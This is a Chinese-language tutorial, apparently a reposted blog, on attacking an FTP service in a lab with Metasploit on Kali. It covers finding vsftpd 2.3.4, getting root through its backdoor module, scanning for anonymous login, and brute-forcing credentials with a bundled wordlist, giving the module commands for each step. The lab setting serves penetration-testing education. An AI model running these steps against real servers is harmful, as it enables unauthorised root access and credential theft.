1.查看FTP服务的版本信息目录
1.查看FTP服务的版本信息
2.通过FTP拿到root权限
3.ftp匿名登陆扫描
4.ftp暴力破解
1.打开kali系统的metasploit软件。
3.使用模块
4.查看需要配置的参数 show options
5.设置目标主机--靶机 set RHOSTS 192.168.0.112
6.run
如图,我们可以得知ftp的版本号是2.3.4
2.通过FTP拿到root权限1.查找对应的2.3.4ftp模块
如图,我们可以看到一个backdoor的模块,是一个后门模块。
2.使用模块
3. 查看需要配置的参数show options
4.设置目标主机 set RHOSTS 192.168.0.112
5.run
如图,我们可以看到root,我们已经拿到了root权限。
3.ftp匿名登陆扫描1.查找模块 search name:anonymous (anonymous:匿名)
2.使用模块
3.查找需要配置的参数
4.设置目标主机 set RHOSTS 192.168.0.112
5.run
如图,我们看到可以连上ftp了,但是是只读的。我们可以试着去连接一下。
4.ftp暴力破解
我们刚刚只能只读去链接ftp,要想上传下载读写文件,我们就需要去获取账号密码。
1.查找模块 search ftp_login
2.使用模块
3.查找需要配置的参数 show options
4.设置目标主机 set RHOSTS 192.168.0.112
5.设置字典
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。
6.run
如图,成功获取到账号密码。
7.通过ftp进行登录
上传一个图片,测试上传成功。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)